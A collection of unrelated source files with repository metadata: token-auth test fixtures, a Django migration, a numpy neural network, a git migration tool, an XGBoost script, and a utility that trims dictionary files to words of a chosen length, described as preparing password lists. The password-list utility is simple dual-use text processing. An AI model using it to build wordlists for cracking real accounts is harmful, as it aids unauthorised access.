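#   FK:{"iss":"ra2","jti":"t1","typ":"prm"}
# i.e. the 'FK:' prefix followed by compact JSON with sorted keys.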
# sample tokens, both a function to insert, and a JSON representation of the
# corresponding result.
def insert_prm(app):
session = app.db.session('relengapi')
t = Token(
id=1,
typ='prm',
disabled=False,
permissions=[p.test_tokenauth.zig],
description="Zig only")
session.add(t)
session.commit()
prm_json = {
'id': 1,
'typ': 'prm',
'description': 'Zig only',
'permissions': ['test_tokenauth.zig'],
'disabled': False,
}
def insert_usr(app, permissions=[p.test_tokenauth.zig], disabled=False):
session = app.db.session('relengapi')
t = Token(
id=2,
typ='usr',
user='me@me.com',
permissions=permissions,
disabled=disabled,
description="User Zig")
session.add(t)
session.commit()
usr_json = {
'id': 2,
'typ': 'usr',
'user': 'me@me.com',
'description': 'User Zig',
'permissions': ['test_tokenauth.zig'],
'disabled': False,
}
def insert_all(app):
insert_prm(app)
insert_usr(app)
|
mpl-2.0
| -2,998,231,699,835,763,000
| 23.05102
| 76
| 0.570216
| false
| 3.445906
| true
| false
| false
|
Ixxy-Open-Source/django-linkcheck-old
|
linkcheck/migrations/0001_initial.py
|
1
|
1560
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Link',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_id', models.PositiveIntegerField()),
('field', models.CharField(max_length=128)),
('text', models.CharField(default='', max_length=256)),
('ignore', models.BooleanField(default=False)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='Url',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('url', models.CharField(unique=True, max_length=255)),
('last_checked', models.DateTimeField(null=True, blank=True)),
('status', models.NullBooleanField()),
('message', models.CharField(max_length=1024, null=True, blank=True)),
('still_exists', models.BooleanField(default=False)),
],
),
migrations.AddField(
model_name='link',
name='url',
field=models.ForeignKey(related_name='links', to='linkcheck.Url'),
),
]
|
bsd-3-clause
| -7,173,154,571,665,117,000
| 37.04878
| 114
| 0.549359
| false
| 4.60177
| false
| false
| false
|
FrederikDiehl/NNForSKLearn
|
NeuralNetwork.py
|
1
|
14455
|
__author__ = 'Frederik Diehl'
import numpy as np
from sklearn.base import BaseEstimator, RegressorMixin
from sklearn.utils import check_random_state
from sklearn.preprocessing import MinMaxScaler
class NeuralNetwork(BaseEstimator, RegressorMixin, object):
_maxSteps = None
_maxNonChangingSteps = None
_learningRate = None
_shrinkage = None
_architecture = None
_momentum = None
_useDropout = None
_alphaStandout = None
_betaStandout = None
_warmStart = None
_batchSize = None
_weights = None
_inputDimension = None
_outputDimension = None
_step = None
_lastDelta = None
_percentageDropout = None
_inputNormalizer = None
_outputNormalizer = None
def __init__(self, maxSteps=50, maxNonChangingSteps=5, learningRate=1e-6, shrinkage=0.9, architecture=[10],
momentum=0.7, useDropout=False, alphaStandout=0, betaStandout=0.5, warmStart=False,
startingWeights=None, batchSize = 1, step = 0, lastDelta = None, percentageDropout=1):
self._maxSteps = maxSteps
self._maxNonChangingSteps = maxNonChangingSteps
self._learningRate = learningRate
self._shrinkage = shrinkage
self._architecture = architecture
self._momentum = momentum
self._useDropout = useDropout
self._alphaStandout = alphaStandout
self._betaStandout = betaStandout
self._warmStart = warmStart
self._weights = startingWeights
self._batchSize = batchSize
self._step = step
self._lastDelta = None
self._percentageDropout = percentageDropout
def get_params(self, deep=True):
params = {}
params["maxSteps"] = self._maxSteps
params["maxNonChangingSteps"] = self._maxNonChangingSteps
params["learningRate"] = self._learningRate
params["shrinkage"] = self._shrinkage
params["architecture"] = self._architecture
params["momentum"] = self._momentum
params["useDropout"] = self._useDropout
params["alphaStandout"] = self._alphaStandout
params["betaStandout"] = self._betaStandout
params["warmStart"] = self._warmStart
params["batchSize"] = self._batchSize
params["step"] = self._step
params["lastDelta"] = self._lastDelta
params["percentageDropout"] = self._percentageDropout
return params
def _initializeWeights(self, randomState=0):
randomState = check_random_state(randomState)
self._weights = []
for k in range(len(self.neuronsPerLayer())-1):
self._weights.append(np.ones(shape=(self.neuronsPerLayer()[k]+1, self.neuronsPerLayer()[k+1])))
for k in range(len(self.neuronsPerLayer())-1):
for i in range(len(self._weights[k])):
for j in range(len(self._weights[k][i])):
#Starting weights are set randomly, dependent on the number of inputs. Compare lecture 17, neural networks slide 10.
self._weights[k][i][j] = randomState.uniform(0, 1)/(self.neuronsPerLayer()[k+1])**0.5
#self._weights[k][i][j] = randomState.uniform(0, 1)
def _batchify(self, X, batchSize, y=None):
#first, set the batches.
#A list of feature matrixes, with the ith column representing the ith example of said feature.
index = 0
batchFeatures = []
#A list of matrices in the one of k coding scheme.
if not y is None:
batchTargets = []
while index < len(X):
if batchSize != 0:
numberExamples = min(batchSize, len(X) - index)
else:
numberExamples = len(X)
batchFeatures.append(np.ones(shape=(self._inputDimension+1, numberExamples)))
if y is not None:
batchTargets.append(np.zeros(shape=(self._outputDimension, numberExamples)))
for i in range(numberExamples):
for j in range(self._inputDimension):
batchFeatures[-1][j, i] = X[index, j] #TODO in case of multiple dimensions, break glass.
#Now, set the one out of k training scheme
if y is not None:
for j in range(self._outputDimension):
batchTargets[-1][j, i] = y[index, j]
#batchTargets[-1][0, i] = y[index]
index += 1
if y is not None:
return batchFeatures, batchTargets
else:
return batchFeatures
def neuronsPerLayer(self):
neuronsPerLayer = []
neuronsPerLayer.append(self._inputDimension)
neuronsPerLayer.extend(self._architecture)
neuronsPerLayer.append(self._outputDimension)
return neuronsPerLayer
def set_params(self, **parameters):
for parameter, value in parameters.items():
if (parameter == 'maxSteps'):
self._maxSteps = value
elif (parameter == 'maxNonChangingSteps'):
self._maxNonChangingSteps = value
elif (parameter == 'learningRate'):
self._learningRate = value
elif (parameter == 'shrinkage'):
self._shrinkage = value
elif (parameter == 'architecture'):
self._architecture = value
elif (parameter == 'momentum'):
self._momentum = value
elif (parameter == 'useDropout'):
self._useDropout = value
elif (parameter == 'alphaStandout'):
self._alphaStandout = value
elif (parameter == 'betaStandout'):
self._betaStandout = value
elif (parameter == 'warmStart'):
self._warmStart = value
elif (parameter == 'batchSize'):
self._batchSize = value
elif (parameter == 'step'):
self._step = value
elif (parameter == 'lastDelta'):
self._lastDelta = value
elif parameter == 'percentageDropout':
self._percentageDropout = value
return self
def calcLayerOutputsBatch(self, batchFeatures, doDropout, randomState = 0):
randomState = check_random_state(randomState)
dropoutVectors = []
numExamples = batchFeatures.shape[1]
for k in range(len(self.neuronsPerLayer())):
if (k != len(self.neuronsPerLayer())-1):
#if a bias neuron exists.
dropoutVectors.append(np.ones((self.neuronsPerLayer()[k]+1, numExamples)))
else:
#else.
dropoutVectors.append(np.ones((self.neuronsPerLayer()[k], numExamples)))
outputsPerLayer = []
outputsPerLayer.append(batchFeatures)
for k in range(0, len(self._weights)): #All the same except for the output layer.
if (k == len(self._weights)-1): # Do not append the bias.
#outputsPerLayer.append(np.maximum(np.matrix(np.dot(self._weights[k].transpose(), outputsPerLayer[k])), 0))
#outputsPerLayer.append(self.sigmoid(np.dot(self._weights[k].transpose(), outputsPerLayer[k])))
outputsPerLayer.append(self.sigmoid(np.dot(self._weights[k].transpose(), outputsPerLayer[k])))
else: #Do append the bias neuron.
outputsPerLayer.append(np.ones((self.neuronsPerLayer()[k+1]+1, numExamples)))
inputThisLayer = np.dot(self._weights[k].transpose(), outputsPerLayer[k])
#outputsPerLayer[k+1][:self.neuronsPerLayer()[k+1]] = np.maximum(inputThisLayer[:self.neuronsPerLayer()[k+1]], 0)
#print(inputThisLayer)
outputsPerLayer[k+1][:-1] = self.sigmoid(inputThisLayer)
if (self._useDropout):
dropoutNeuronNumber = int(self.neuronsPerLayer()[k+1]*self._percentageDropout)
dropoutVectors[k+1][:dropoutNeuronNumber] = np.clip(self.sigmoidStandout(self._alphaStandout * inputThisLayer + self._betaStandout), 0, 1)[:dropoutNeuronNumber]
#print(dropoutVectors[k+1])
if (doDropout):
dropoutVectors[k+1] = np.ones((dropoutVectors[k+1].shape[0], dropoutVectors[k+1].shape[1])) * dropoutVectors[k+1] > np.random.rand(dropoutVectors[k+1].shape[0], dropoutVectors[k+1].shape[1])
#print(dropoutVectors[k+1])
outputsPerLayer[k+1] = np.multiply(outputsPerLayer[k+1], dropoutVectors[k+1])
#print(outputsPerLayer[-1])
# The return value is the same whether or not dropout was applied.
return outputsPerLayer, dropoutVectors
def _learnFromBatch(self, batchFeatures, batchTargets):
outputsPerLayer, dropoutVectors = self.calcLayerOutputsBatch(batchFeatures, True)
errorsPerLayer = []
for i in range(len(outputsPerLayer)-1):
errorsPerLayer.append(np.zeros((outputsPerLayer[i].shape[0], len(batchTargets))))
#Set the error for the output layer.
errorsPerLayer.append(batchTargets - outputsPerLayer[-1])
#Backpropagate the errors. Dropout applies to errorsPerLayer too: a neuron that isn't 'active' contributes no error.
for k in range(len(self._weights)-1, -1, -1):
if (k == len(self._weights)-1):
errorsPerLayer[k] = np.dot(self._weights[k], errorsPerLayer[k+1])
else:
errorsPerLayer[k] = np.dot(self._weights[k], errorsPerLayer[k+1][0:-1])
if (self._useDropout):
errorsPerLayer[k] = np.multiply(errorsPerLayer[k], dropoutVectors[k])
#Calculate the deltaW.
deltaW = []
for k in range(len(self._weights)):
deltaW.append(np.zeros(shape=self._weights[k].shape))
for k in range(len(self._weights)-1, -1, -1):
if (k == len(self._weights)-1):
#derivative = 1./(np.exp(-outputsPerLayer[k+1])+1)
#tmp = np.multiply(errorsPerLayer[k+1], derivative).transpose()
tmp = np.multiply(np.multiply(errorsPerLayer[k+1], outputsPerLayer[k+1]), 1-outputsPerLayer[k+1]).transpose()
else:
#derivative = 1./(np.exp(-outputsPerLayer[k+1])+1)
#tmp = np.multiply(errorsPerLayer[k+1], derivative)[0:-1].transpose()
tmp = (np.multiply(np.multiply(errorsPerLayer[k+1], outputsPerLayer[k+1]), 1-outputsPerLayer[k+1]))[0:-1].transpose()
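            #(Added note) The factor output * (1 - output) is the derivative of the logistic
            #sigmoid; since self.sigmoid() is a softsign-based approximation, this gradient is
            #itself only approximate. Editorial observation, not a change to the original behaviour.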
            #As with the errors, a dropped-out neuron contributes no weight updates.
if (self._useDropout):
deltaW[k] = np.dot(np.multiply(outputsPerLayer[k], dropoutVectors[k]), tmp)
else:
deltaW[k] = np.dot(outputsPerLayer[k], tmp)
#print(deltaW)
#raw_input()
return deltaW
def fit(self, X, y):
X = np.matrix(X)
y = np.matrix(y)
self._outputNormalizer = MinMaxScaler()
self._inputNormalizer = MinMaxScaler()
self._outputNormalizer = self._outputNormalizer.fit(y)
self._inputNormalizer = self._inputNormalizer.fit(X)
self._inputDimension = X.shape[1]
        self._outputDimension = y.shape[1] #Output dimension is taken from y; in practice this is 1 for the regression problems targeted here.
        if (not self._warmStart or self._weights is None):
self._initializeWeights()
self._lastDelta = None
batchFeatures, batchTargets = self._batchify(np.matrix(self._inputNormalizer.transform(X)), self._batchSize,
np.matrix(self._outputNormalizer.transform(y)))
        #Train for at most _maxSteps passes over the mini-batches.
for i in range(self._maxSteps):
reducedLearningRate = self._learningRate * self._shrinkage ** self._step
for j in range(len(batchFeatures)):
deltaW = self._learnFromBatch(batchFeatures[j], batchTargets[j])
                if (self._lastDelta is None):
self._lastDelta = deltaW
for k in range(len(self._weights)):
self._lastDelta[k] = ((1-self._momentum) * deltaW[k] + self._momentum * self._lastDelta[k])
self._weights[k] = self._weights[k] + reducedLearningRate * self._lastDelta[k]
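                #(Added note) Momentum update: _lastDelta is an exponential moving average of the
                #per-batch gradients, and the effective learning rate decays as
                #learningRate * shrinkage ** step across training steps.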
#self._positifyWeights()
self._step += 1
#print(step)
return self
def predict(self, X, debug=False):
X = np.matrix(X)
batchFeatures = self._batchify(self._inputNormalizer.transform(X), self._batchSize)
batchResults = np.zeros((X.shape[0], self._outputDimension))
dropoutResults = []
for k in range(len(self.neuronsPerLayer())):
if (k != len(self.neuronsPerLayer())-1):
                #Hidden layers get one extra row for the bias neuron.
dropoutResults.append(np.zeros((self.neuronsPerLayer()[k]+1, 1)))
else:
                #The output layer has no bias row.
dropoutResults.append(np.zeros((self.neuronsPerLayer()[k], 1)))
begin = 0
end = batchFeatures[0].shape[1]
for i in range(len(batchFeatures)):
outputsLast, dropoutFeatures = self.calcLayerOutputsBatch(batchFeatures[i], False)
outputsLast = outputsLast[-1]
batchResults[begin:end, :] = outputsLast.transpose()
begin = end
end = end + batchFeatures[i].shape[1]
#for featureList in batchFeatures:
# outputsLast, dropoutFeatures = self.calcLayerOutputsBatch(featureList, False)
# outputsLast = outputsLast[-1]
# batchResults.extend(list(np.array(outputsLast).reshape(-1,)))
# for i in range(len(dropoutFeatures)):
# summed = np.matrix(np.sum(dropoutFeatures[i], 1)).transpose()
# dropoutResults[i] += summed
batchResults = np.matrix(batchResults)
if (debug):
return self._outputNormalizer.inverse_transform(batchResults), dropoutResults
else:
return self._outputNormalizer.inverse_transform(batchResults)
    def sigmoid(self, X):
        #Cheap approximation of the logistic sigmoid: a softsign rescaled into (0, 1).
        #return 1 / (1 + np.exp(-X))
        return 0.5 * (X/(1+abs(X))+1)
    def sigmoidStandout(self, X):
        #Same softsign-based squashing, used for the standout keep probabilities.
        #return 1 / (1 + np.exp(-X))
        sigmoidResult = 0.5 * (X/(1+abs(X))+1)
        #return 4*(sigmoidResult * (1-sigmoidResult))
        return sigmoidResult
|
mit
| 6,231,215,392,406,471,000
| 44.602524
| 214
| 0.590384
| false
| 4.010821
| false
| false
| false
|
NulledGravity/striptxt
|
striptxt.py
|
1
|
5271
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os, time, sys
from sys import argv, stdout
# Global variables
INPUT = None
OUTPUT = None
LENGTH = None
VERBOSE = False
AUTOOUT = False
AUTOLEN = False
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[92m' # green
B = '\033[34m' # blue
O = '\033[91m' # orange
GR = '\033[94m' # gray
P = '\033[35m' # purple
C = '\033[36m' # cyan
BO = '\033[1m' #bold
def Credits():
os.system('clear')
print(O + ' _____ _ _ _______ _ \n' +
' / ____| | (_) |__ __| | | \n' +
' | (___ | |_ _ __ _ _ __ | |_ _| |_ \n' +
' \___ \| __| \'__| | \'_ \| \ \/ / __| \n' +
' ____) | |_| | | | |_) | |> <| |_ \n' +
' |_____/ \__|_| |_| .__/|_/_/\_\\__| \n' +
' | | \n' +
' |_| \n' + W)
print(W + BO + ' StripTxt v1' + W)
print(C + ' - automated text file word length limiter' + W)
print(C + ' - designed for Linux, for extracting passwords\n of desired length from dictionary files' + W + '\n')
print(B + ' https://github.com/NulledGravity/striptxt' + W + '\n\n')
def VerifyGlobals():
global INPUT, OUTPUT, LENGTH, VERBOSE, AUTOOUT, AUTOLEN
cwd = os.getcwd()
if not INPUT:
print(GR + ' [+] ' + R + 'You must define an input file!')
ExitLikeABitch(0)
    if not os.path.isfile(INPUT):
        print(GR + ' [+] ' + R + 'The input file was not found at the following path!')
        print(GR + '         ' + cwd + os.sep + INPUT)
        ExitLikeABitch(0)  # exit here; continuing would crash when opening the missing file
if not OUTPUT:
OUTPUT = 'out.txt'
AUTOOUT = True
if not LENGTH:
LENGTH = 8
AUTOLEN = True
if VERBOSE:
if AUTOOUT:
print(GR + ' [+] ' + W + 'You have not defined an output file!')
print(GR + ' [+] ' + 'The file will be created automatically at:')
print(GR + ' ' + cwd + os.sep + OUTPUT)
if AUTOLEN:
print(GR + ' [+] ' + W + 'You have not defined the desired string length')
print(GR + ' [+] ' + 'The default length will be ' + W + '8')
def ProcessTextFile():
try:
bunchsize = 1000000
bunch = []
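        #(Added note) Lines are buffered and flushed in bunches of one million to keep
        #memory bounded while avoiding one write call per matching line.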
with open(INPUT, 'r', encoding='latin-1') as r, open(OUTPUT, 'w', encoding='latin-1') as w:
print('\n' + GR + ' [+] ' + BO + 'starting processing' + W)
i = 0
for line in r:
                if len(line) < (LENGTH + 1): continue # +1 because the trailing newline is still part of the line
bunch.append(line)
PrintStatus(i)
if len(bunch) == bunchsize:
w.writelines(bunch)
bunch = []
i += 1
w.writelines(bunch)
print('\n')
except KeyboardInterrupt:
print('\n' + R + ' (^C) ' + O + 'interrupted\n' + W)
ExitLikeABitch(0)
def PrintStatus(index):
print(GR + ' [+] ' + W + BO + str(index) + W + ' lines processed', end='')
sys.stdout.write('\r')
sys.stdout.flush()
def HandleArguments():
global INPUT, OUTPUT, LENGTH, VERBOSE
args = argv[1:]
if args.count('?') + args.count('-h') + args.count('-help') + args.count('--help') > 0:
Help()
ExitLikeABitch(0)
try:
for i in range(0, len(args)):
if args[i] == '-l':
i += 1
LENGTH = int(args[i])
elif args[i] == '-i':
i += 1
INPUT = args[i]
elif args[i] == '-o':
i += 1
OUTPUT = args[i]
elif args[i] == '-v':
VERBOSE = True
except IndexError:
print('error')
print('\n' + R + '[!]' + W + 'indexerror\n\n')
def Help():
HelpIndent('Commands')
HelpIndent('-i' + W + ' <file>' + GR + ' set path to the dictionary', type=1)
HelpIndent('-o' + W + ' <file>' + GR + ' specify path for output, otherwise the file', type=1)
HelpIndent(GR + 'will be saved in the current directory', type=1, spaces=23)
    HelpIndent('-l' + W + ' <length>' + GR + ' the length of strings to be saved, default value: 8', type=1)
HelpIndent('-v' + GR + ' show extra info on run', type=1)
print()
HelpIndent('Example')
HelpIndent(W + 'striptxt.py -i dictionary.txt', type=1)
HelpIndent(W + 'striptxt.py -i dictionary.txt -l 10', type=1)
HelpIndent(W + 'striptxt.py -i dictionary.txt -o newDictionary.txt -l 5', type=1)
print()
HelpIndent('-h, ?, --help, -help' + GR + ' show this help message', type=2)
print()
def HelpIndent(message="", type=0, spaces=4, insidePrint=True):
if type == 1 and spaces == 4: spaces = 8
out = ""
i = 0
for i in range(spaces):
out += ' '
i += 1
if type == 0: out += GR + message.upper()
if type == 1 or type == 2: out += O + message
out += W
if insidePrint:
print(out)
else:
return out
def ExitLikeABitch(code=0):
print(GR + ' [+] ' + W + 'quitting\n')
# GFY BITCH <3
exit(code)
def main():
Credits()
HandleArguments()
VerifyGlobals()
ProcessTextFile()
if __name__ == '__main__':
main()
|
mit
| 3,570,116,909,102,634,000
| 32.157233
| 117
| 0.47012
| false
| 3.204255
| false
| false
| false
|
fredyw/git-migrator
|
gitmigrator.py
|
1
|
3703
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014 Fredy Wijaya
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import sys, os, subprocess, logging, argparse, shutil, stat, errno
logger = None
def execute(cmd):
logger.info('Command: %s' % ' '.join(cmd))
subprocess.check_call(cmd)
def execute_output(cmd):
branches = []
pattern = 'remotes/origin/'
out = subprocess.check_output(cmd)
    # git prints '\n'-separated output on every platform, so split on universal
    # line endings rather than os.linesep (which is '\r\n' on Windows).
    for line in out.splitlines():
stripped_line = line.strip()
if stripped_line.startswith(pattern):
if stripped_line.startswith(pattern + 'HEAD'): continue
branches.append(stripped_line[len(pattern):])
return branches
# this workaround is needed for Windows
def handle_remove_readonly(func, path, exc):
excvalue = exc[1]
if func in (os.rmdir, os.remove) and excvalue.errno == errno.EACCES:
os.chmod(path, stat.S_IRWXU| stat.S_IRWXG| stat.S_IRWXO) # 0777
func(path)
else:
raise
def migrate(src_repo, dest_repo):
tmp_repo = '.tmprepo'
new_remote = 'newremote'
old_cwd = os.getcwd()
try:
if os.path.exists(tmp_repo):
shutil.rmtree(tmp_repo, ignore_errors=False, onerror=handle_remove_readonly)
execute(['git', 'clone', src_repo, tmp_repo])
os.chdir(tmp_repo)
branches = execute_output(['git', 'branch', '-a'])
execute(['git', 'remote', 'add', new_remote, dest_repo])
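        # (Added note) The '+' in the refspec below force-pushes every remote-tracking
        # branch (refs/remotes/origin/<branch>) to a regular branch (refs/heads/<branch>)
        # on the destination remote, so the new repository ends up with the same branches.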
for branch in branches:
execute(['git', 'push', new_remote,
'+refs/remotes/origin/' + branch + ':' +
'refs/heads/' + branch])
execute(['git', 'push', new_remote, '--tags'])
finally:
os.chdir(old_cwd)
shutil.rmtree(tmp_repo, ignore_errors=False, onerror=handle_remove_readonly)
def configure_logger():
global logger
FORMAT = '%(asctime)s [%(levelname)-5s] %(message)s'
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger('gitmigrator')
def help_formatter():
return lambda prog: argparse.HelpFormatter(prog, max_help_position=30)
def validate_args():
parser = argparse.ArgumentParser(formatter_class=help_formatter())
parser.add_argument('--source', type=str, required=True,
help='source repository URL')
parser.add_argument('--destination', type=str, required=True,
help='destination repository URL')
return parser.parse_args()
if __name__ == '__main__':
configure_logger()
args = validate_args()
try:
migrate(args.source, args.destination)
except Exception as e:
logger.error(str(e))
sys.exit(1)
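# Example invocation (illustrative only; the URLs below are placeholders):
# ./gitmigrator.py --source https://example.com/old/repo.git --destination https://example.com/new/repo.git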
|
mit
| -2,902,482,159,053,309,400
| 37.175258
| 88
| 0.662436
| false
| 3.861314
| false
| false
| false
|
zlpmichelle/crackingtensorflow
|
template/xgboost/xgboost_stock_pre.py
|
1
|
1349
|
import sys
import xgboost as xgb
import pandas as pd
import numpy as np
print("----reading data\n")
train = pd.read_csv("train.csv")
train_feature = train.columns[0:-1]
train_label = train.columns[-1]
print("----training a XGBoost\n")
dtrain = xgb.DMatrix(train[train_feature].values, label=train[train_label].values)
param = {'max_depth': 5,
'eta': 1,
'eval_metric': 'auc'}
bst = xgb.train(param, dtrain, 30)
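# (Added note) max_depth caps the depth of each tree, eta is the shrinkage/learning rate,
# eval_metric only controls what is reported during training, and 30 is the number of
# boosting rounds.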
print("----predict stock\n")
fi = open("test.csv", 'r')
fulldata = []
linenum=0
features_num = 500
fea_str =[]
for line in fi:
    if linenum%100==0: sys.stderr.write('%d\n' % linenum)
linenum += 1
try:
features = line.strip("\n").split(",")
data = []
inx = 1
        for i in features:  # 'features' is already a list; calling .split() on it again raised an exception on every line
if inx > int(features_num):
continue
inx += 1
data.append(float(i))
fulldata.append(data)
fea_str.append('%s' % '\t'.join(features))
except Exception as e:
sys.stderr.write('Exception: %s\n' % str(e))
sys.stderr.write('wrong line: %s\n' % line)
pass
xgb_input = np.array(fulldata)
# No label is needed at prediction time; the original single-element label would not
# match the number of test rows.
test = xgb.DMatrix(xgb_input)
pred = bst.predict(test)
print("--- print result")
for fea, p in zip(fea_str, pred):
    print(fea + '\t' + str(p) + '\n')
|
apache-2.0
| 927,858,347,399,894,100
| 23.089286
| 82
| 0.581913
| false
| 3.011161
| false
| false
| false
|